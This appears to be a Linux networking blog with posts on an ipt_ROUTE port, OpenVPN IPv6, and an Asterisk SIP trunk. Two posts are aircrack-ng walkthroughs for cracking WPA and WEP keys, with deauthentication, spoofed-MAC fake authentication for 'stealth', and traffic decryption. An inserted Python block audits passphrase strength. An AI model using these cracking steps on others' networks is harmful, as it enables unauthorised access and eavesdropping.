May 18
Tom | Linux General, Linux System Administration, Networking
The ipt_ROUTE module was deprecated in an earlier version of Linux 2.6; however, I needed it, so I ported it to Linux kernel version 2.6.31.
Disclaimer: wherever possible iproute2 should be used to achieve the desired effect.
The sources include the Kernel module and extensions to iptables.
This module and iptables extension create a new target which may be used on the mangle table.
Target usage: -j ROUTE <option>
options:
--oif ifname – Route packet through `ifname' network interface
--iif ifname – Change packet's incoming interface to `ifname'
--gw ip – Route packet via this gateway `ip'
--continue – Route packet and continue traversing the rules. (Not valid with --iif or --tee)
--tee – Duplicate packet and route the duplicate, continue traversing the original packet. (Not valid with --iif or --continue)
I have tested the ported module on the PREROUTING and INPUT chains of the mangle table.
I use this module to route packets whose destination IP address matches a local IP address out of an ethernet interface (using the '--oif' option). These packets would normally be directed to the local system.
Apr 21
Tom | IPv6, Linux System Administration, Networking
Note: IPv6 is not supported using OpenVPN on Debian Squeeze (stable). The version used by Debian Wheezy (testing) supports IPv6.
Network setup:
- 192.168.1.0/24 - Local IPv4 network
- 2001:412:abcd::/48 - Local IPv6 network
- 192.168.2.0/24 - Tunnel IPv4 network
- 2001:412:abcd:2::/64 - Tunnel IPv6 network
I have included only the sections of the config files which need amending to enable IPv6 over OpenVPN.
Client Config
# Use the same setting as you are using on
# the server.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
dev tun
# enable ipv6
tun-ipv6
Server Config
# "dev tun" will create a routed IP tunnel,
# "dev tap" will create an ethernet tunnel.
# Use "dev tap0" if you are ethernet bridging
# and have precreated a tap0 virtual interface
# and bridged it with your ethernet interface.
# If you want to control access policies
# over the VPN, you must create firewall
# rules for the TUN/TAP interface.
# On non-Windows systems, you can give
# an explicit unit number, such as tun0.
# On Windows, use "dev-node" for this.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
dev tun0
# Enable TUN IPv6 module
tun-ipv6
# Configure server mode and supply a VPN subnet
# for OpenVPN to draw client addresses from.
# The server will take 10.8.0.1 for itself,
# the rest will be made available to clients.
# Each client will be able to reach the server
# on 10.8.0.1. Comment this line out if you are
# ethernet bridging. See the man page for more info.
server 192.168.2.0 255.255.255.0
server-ipv6 2001:412:abcd:2::/64
# Push routes to the client to allow it
# to reach other private subnets behind
# the server. Remember that these
# private subnets will also need
# to know to route the OpenVPN client
# address pool (10.8.0.0/255.255.255.0)
# back to the OpenVPN server.
push "route 192.168.1.0 255.255.255.0"
push "route-ipv6 2001:412:abcd::/48"
# If enabled, this directive will configure
# all clients to redirect their default
# network gateway through the VPN, causing
# all IP traffic such as web browsing and
# DNS lookups to go through the VPN
# (The OpenVPN server machine may need to NAT
# or bridge the TUN/TAP interface to the internet
# in order for this to work properly).
;push "redirect-gateway def1 bypass-dhcp"
# Enable to make openvpn the default route for ipv6 connectivity?
;push "route-ipv6 2000::/3"
Mar 19
Tom | Networking
As far as I can tell Cisco CUBE only supports unauthenticated SIP trunks, which isn’t too much trouble for Asterisk.
In sip.conf:
type=peer
host=x.x.x.x
context=trunks-inbound
allow=all
insecure=invite,port
trustrpid=yes
sendrpid=no
qualify=yes
(change ‘trunks-inbound’ to the necessary context)
In extensions.conf:
exten=>_0.,1,Set(CALLERID(num)=nnn-nnn-${CALLERID(num)})
exten=>_0.,n,Dial(SIP/x.x.x.x/${EXTEN:1})
exten=>_0.,n,Hangup
(First line is optional, and simply adds a prefix to the outgoing caller ID)
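The “insecure=invite,port” is the critical part, as the source port from the Cisco CUBE appears to be dynamic, unlike a traditional SIP trunk. The “port” value lets Asterisk match the peer by IP address without matching the source port, and “invite” skips authentication of incoming INVITEs, so the peer is identified by its host= address alone.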
Mar 19
Tom | Linux General, Networking, Wireless
WPA and WPA2 provide good WiFi security which is mainly susceptible to brute force attacks. Here is how such a brute force attack may be carried out.
Using Debian Wheezy (testing) and an Intel Corporation Centrino Wireless-N 1000 card:
- Stop Network Manager: /etc/init.d/network-manager stop
- Enter monitor mode: airmon-ng start wlan0
- Find nearby networks: airodump-ng mon0
- Identify the target BSSID and Channel number (-c option below)
- Start packet capture and leave running: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capturefile mon0
- Leave packet capture running until “WPA Handshake” is seen (displayed in the top-right of airodump-ng)
- Or attempt to force a WPA Handshake by deauthenticating a client station: aireplay-ng --deauth 1 -a 00:11:22:33:44:55 -c 55:55:55:55:55:55 --ignore-negative-one mon0 (where -c is the MAC address of one of the stations displayed in airodump-ng)
- Apply brute force: aircrack-ng -w password.lst capturefile.cap
- The password.lst is included in the ‘test/’ directory of the aircrack-ng source. Many others are available for download.
- Stop monitor mode: airmon-ng stop mon0
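Why the wordlist step decides the outcome, seen from the network owner's side (an added example, not part of the original post): the WPA/WPA2-PSK master key is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, so a passphrase that appears in a wordlist or has a small keyspace falls quickly while a long random one does not. The sample wordlist, the sample passphrases and the rate of 100,000 guesses per second are constructed assumptions.

```python
import hashlib
import math
import string

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK master key: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters long")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)

def charset_size(passphrase: str) -> int:
    """Combined size of the ASCII character classes the passphrase draws on."""
    classes = (string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation + " ")
    return sum(len(c) for c in classes if any(ch in c for ch in passphrase))

def audit(passphrase: str, wordlist: set, guesses_per_second: float) -> dict:
    """Rate one of our own PSKs against a wordlist and an exhaustive search.

    The bit count assumes every character was chosen at random, so for a
    human-chosen passphrase it is an upper bound, not a measurement.
    """
    if passphrase in wordlist:
        return {"in_wordlist": True, "bits": 0.0, "years": 0.0}
    bits = len(passphrase) * math.log2(charset_size(passphrase))
    seconds = 2 ** bits / guesses_per_second
    return {"in_wordlist": False, "bits": bits,
            "years": seconds / (365.25 * 24 * 3600)}

# Constructed sample data, not taken from any real network or wordlist.
SAMPLE_WORDLIST = {"password", "12345678", "letmein123"}
ASSUMED_RATE = 100_000   # guesses per second, an assumption for illustration
SAMPLE_PSKS = ("password", "qzjxkvwp", "T7#mQ9!vLz2@Xp4&")

if __name__ == "__main__":
    # Each guess costs one full PBKDF2 run, and the SSID salt ties it to one network name.
    print(wpa_pmk("password", "IEEE").hex())
    for psk in SAMPLE_PSKS:
        print(psk, audit(psk, SAMPLE_WORDLIST, ASSUMED_RATE))
```

The "password"/"IEEE" pair is the published IEEE 802.11i test vector, so the derivation can be checked against a known result.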
Mar 19
Tom | Linux General, Networking, Wireless
Using Debian Wheezy (testing) with an Intel Corporation Centrino Wireless-N 1000 card…
- Stop network manager: /etc/init.d/network-manager stop
- Enter monitor mode: airmon-ng start wlan0
- Find nearby networks: airodump-ng mon0
- Identify the target BSSID, SSID and Channel number (-c option below)
- Start packet capture and leave running: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capturefile mon0
- Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
- aireplay-ng --fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one mon0
- aireplay-ng --arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one -e SSID mon0
- When this sees an ARP packet, it will go like crazy injecting packets and you will see the “#Data” rapidly increasing in the airodump-ng window
- After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
- The WEP key should then be displayed in the terminal window.
- The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
- Exit monitor mode: airmon-ng stop mon0